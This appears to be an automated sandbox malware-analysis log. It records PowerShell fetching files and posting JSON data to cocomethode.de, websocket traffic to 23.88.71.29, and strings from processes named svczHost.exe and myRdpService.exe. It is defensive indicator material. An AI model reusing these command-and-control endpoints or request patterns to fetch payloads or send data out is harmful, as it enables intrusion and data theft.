Source: global traffic	HTTP traffic detected: GET /Zd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dcadc494ef7b10813af76bf343da6dd0c11bbafd53f9d40c4534b314e17178a5f9839114b731c4ae608c27f3e23b544cc7edefd58334b3e8215446329673/Windows%20Defender/16/16/user/191 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b356ad7104732828f4fb9 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 303
Source: global traffic	HTTP traffic detected: GET /file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2eecb14e0349f34ea28f5372e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6525225d58c437ec7708 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 303
Source: global traffic	HTTP traffic detected: GET /file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd85082d15ea7c027b4749aea8867e3e247bd648d250a09153f5a9051f7fcec7ff2ad6088be998d837733babb1d81d0bf712c8881e6fc53dd0663bdd97b4ba27bb02ac3546087195d7a35ff4f222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe1550829c4b7cb0fd2ddc7 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 85
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe1550829c4b7cb0fd2ddc7 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 86
Source: global traffic	HTTP traffic detected: GET /file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9aa29bce71057a1ce039860e7c69eeb0ef1320f1ed0c8150f1948c2ed6bd2e64238c34031fa4510c3f5cb56f2ddedd92af0607a2d92432a03063f1e11b066993a54f1321da127eb7fbaee23c8f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe1550829c4b7cb0fd2ddc7 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 62
Source: global traffic	HTTP traffic detected: GET /file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 140
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 69
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f529529d9c5cc3350ab521dfddbe2a77c01bd1692f0dae16e5e78590d23aa42283bc9f003b0925ef770ce3dbb430044380316b396c72e0dbe931d81c382 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 200
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 97
Source: global traffic	HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403fdbcfd519d81f0855d69 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 64

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Zd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file3/873ce3957d5a52b126e489a7be00fe0d36246171918182ebc53aea442d8cc4681e33dcadc494ef7b10813af76bf343da6dd0c11bbafd53f9d40c4534b314e17178a5f9839114b731c4ae608c27f3e23b544cc7edefd58334b3e8215446329673/Windows%20Defender/16/16/user/191 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fab88aed1e524947c7d7da0a49b79eba95c8974ec0965a6388d4670ad3805f9a4db0deeddff6eb926ed1fea3ff5b5bc3eb9f9af6cbd9d19e099214ca2c695d2ebc2eecb14e0349f34ea28f5372e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /file2/53b817c6b403fde911a13359ad852a809b72c3a61c9d33030bf0e4130708dbe3ee1fcd85082d15ea7c027b4749aea8867e3e247bd648d250a09153f5a9051f7fcec7ff2ad6088be998d837733babb1d81d0bf712c8881e6fc53dd0663bdd97b4ba27bb02ac3546087195d7a35ff4f222 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /file2/d46efe1d23678ba9d4ecd017493c103a4e1a37d96d59b89e6acdf96bc49b073190f78c9aa29bce71057a1ce039860e7c69eeb0ef1320f1ed0c8150f1948c2ed6bd2e64238c34031fa4510c3f5cb56f2ddedd92af0607a2d92432a03063f1e11b066993a54f1321da127eb7fbaee23c8f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5ed12e05cf2f53d7b015e76bd5b82239987c049defb9be7775f0b50e130d8dbede4588a06e0bb0568bc9dc5a959058d1b98732bb8da4c07dbb567f93f3706dd62fd21f5eae172d5026cdd5279f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f529529d9c5cc3350ab521dfddbe2a77c01bd1692f0dae16e5e78590d23aa42283bc9f003b0925ef770ce3dbb430044380316b396c72e0dbe931d81c382 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/79 HTTP/1.1Host: cocomethode.de
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: cocomethode.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: P37CVvydV0uU0RMWimDFVA==Sec-WebSocket-Version: 13

Source: global traffic

DNS traffic detected: DNS query: cocomethode.de

Source: unknown

HTTP traffic detected: POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b356ad7104732828f4fb9 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: cocomethode.deContent-Length: 303

Source: svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.css
Source: svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.jpg
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5FFDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cocomethode.de
Source: powershell.exe, 00000003.00000002.3434039003.00000194462B1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3756829448.000001EEB1242000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3584448259.0000028E7734E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3912193871.000002872669A000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000015.00000003.4539548419.000001B34B683000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000015.00000003.4538350523.000001B34B683000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4299463018.000001F1C29B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4377385393.0000012FE818B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.4889685299.000001C19E2F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000003.00000002.3434039003.00000194462B1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3756829448.000001EEB1242000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3527256747.0000028E5D2BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3910452157.0000028726630000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000015.00000003.4539548419.000001B34B683000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000015.00000003.4538350523.000001B34B683000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4299463018.000001F1C29B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4377385393.0000012FE818B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.4889685299.000001C19E2F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.3759858698.000001EEB1340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 00000008.00000002.3586894637.0000028E7771D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000004.00000002.3761779223.000001EEB1502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csoft.com/pki/crl/products/MicRoo3
Source: powershell.exe, 0000001D.00000002.4345684918.0000012FE7378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000003.00000002.3430851263.000001943E212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3430851263.000001943E349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3747065999.000001EEA934A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3747065999.000001EEA91B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3578342341.0000028E6F3D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60984000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4968117998.00000287367E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BAA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BA8C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4296362446.0000012F90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.3414023964.000001942E3BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000003.00000002.3414023964.000001942F514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E6082F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000008.00000002.3592553413.0000028E77CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.openxmlformats.or
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
Source: powershell.exe, 00000003.00000002.3414023964.000001942E191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE99141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726771000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AA851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F80001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000019.00000002.4318304566.000001F1C2D0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.o
Source: powershell.exe, 00000008.00000002.3530703045.0000028E60744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3586894637.0000028E7763F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.3414023964.000001942E3BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000003.00000002.3414023964.000001942F514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E6082F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204y
Source: svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: powershell.exe, 0000000D.00000002.4968117998.0000028736A7F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7AA2000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691CC8000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: powershell.exe, 00000003.00000002.3414023964.000001942E191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE99141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AA851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4390124778.0000012FE8295000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpXz
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5FFA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726B43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9AA8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57f
Source: powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9B466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe15
Source: powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b3
Source: powershell.exe, 0000000D.00000002.3915653864.0000028726B7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727E56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403f
Source: powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/Zd
Source: powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cocomethode.de/file2/1bca4c734b4173186ced83141684d6931c1b339cc16a8c5dcf14200f847129d1c5737fa
